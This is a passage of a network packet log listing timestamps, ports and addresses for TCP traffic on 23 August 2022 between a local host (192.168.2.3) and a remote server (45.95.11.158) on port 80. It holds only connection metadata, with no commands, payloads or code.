Aug 23, 2022 03:42:56.115521908 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.115524054 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.115535975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.115565062 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.115587950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.115592957 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.115612984 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.115632057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.115657091 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.115672112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.115679026 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.115712881 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.115742922 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.115746975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.115780115 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.115794897 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.115891933 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.116014004 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.116055012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.116058111 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.116094112 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.116103888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.116144896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.116147995 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.116178036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.116187096 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.116228104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.116229057 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.116255999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.116295099 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.116314888 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.137856007 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.137876034 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.137914896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.137931108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.137969017 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.138024092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.138209105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.138230085 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.138266087 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.138279915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.138282061 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.138334990 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.138361931 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.138417006 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.139873028 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.139904022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.139919996 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.139935017 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.139954090 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.139970064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.139978886 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.139986992 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140000105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140028954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.140089989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.140196085 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140214920 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140232086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140244007 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140256882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.140279055 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140302896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.140327930 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140346050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140348911 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.140358925 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140388012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140394926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.140439987 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.140458107 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.140475988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140494108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140506029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140525103 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.140546083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.140559912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.140856981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140877008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140897036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140909910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.140919924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.140944958 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.140986919 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.145720005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.145742893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.145759106 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.145771980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.145845890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.145848989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.145879030 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.145889997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.145895004 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.145940065 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.145952940 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.145958900 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.145976067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.145989895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.146003008 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.146029949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.146038055 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.146133900 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.146157980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.146194935 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.146202087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.146212101 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.146219969 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.146239042 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.146262884 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.146275043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.146282911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.146285057 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.146315098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.146323919 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.146380901 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.146406889 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.146820068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.146841049 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.146857977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.146869898 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.146888018 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.146892071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.146905899 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.146908998 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.146919012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.146927118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.146948099 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.146950960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.146960974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147010088 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.147028923 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.147167921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147186041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147202015 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147216082 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147232056 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.147253036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.147259951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.147265911 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.147331953 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147373915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147398949 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147417068 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.147423029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147440910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.147468090 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.147480011 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147528887 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.147634029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147686005 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.147701979 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147732019 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147778034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.147783995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147788048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.147806883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147824049 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.147855043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.147895098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147927999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147938013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.147962093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.147981882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.147983074 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.148003101 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.148005009 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.148027897 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.148027897 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.148037910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.148051977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.148068905 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.148089886 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.148097038 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.148106098 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.148113012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.148113966 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.148128986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.148155928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.148165941 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.148171902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.148206949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.148219109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.182385921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.182424068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.182460070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.182482004 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.182502985 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.182529926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.182538033 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.182547092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.182595015 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.182670116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.182673931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.182689905 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.182729959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.182737112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.182770014 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.182784081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.182790041 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.182818890 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.182825089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.182890892 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.183012962 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183034897 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183068037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.183082104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183083057 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.183104038 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183132887 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.183139086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183159113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.183180094 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.183238983 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183309078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183388948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.183432102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183453083 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183495998 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183552027 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.183563948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.183568954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183619022 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.183681965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183703899 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183723927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183738947 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.183744907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183756113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.183773041 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.183789968 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.183857918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183878899 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183898926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.183919907 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.183954000 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.183958054 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.184000969 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.184009075 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.184022903 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.184058905 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.184076071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.184079885 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.184102058 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.184122086 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.184425116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.184488058 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.184503078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.184537888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.184556007 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.184582949 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.184583902 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.184617996 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.184628963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.184668064 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.184745073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.184765100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.184797049 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.184812069 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.184834957 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.184881926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.184930086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.184950113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.184979916 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.184993029 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.185018063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.185053110 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.185064077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.185096025 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.185098886 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.185137033 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.185142994 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.185177088 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.185192108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.185221910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.185224056 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.185240030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.185269117 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.185285091 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.188905954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.188925982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.188942909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.188977003 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.189002991 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.189013004 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.189033031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.189064026 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.189136028 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.189188004 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.189261913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.189310074 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.189466000 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.189483881 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.189518929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.189538002 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.190129995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.190148115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.190165043 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.190180063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.190220118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.190253973 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.190268993 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.190290928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.190306902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.190309048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.190325022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.190334082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.190350056 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.190372944 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.191586971 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.191606045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.191622972 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.191643000 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.191667080 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.191777945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.191823006 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.191858053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.191910028 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.192107916 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.192125082 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.192163944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.192167044 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.192186117 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.192198992 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.192217112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.192256927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.192260981 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.192289114 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.192292929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.192312956 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.192331076 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.192359924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.212960005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.212990046 CEST	80	49774	45.95.11.158	192.168.2.3
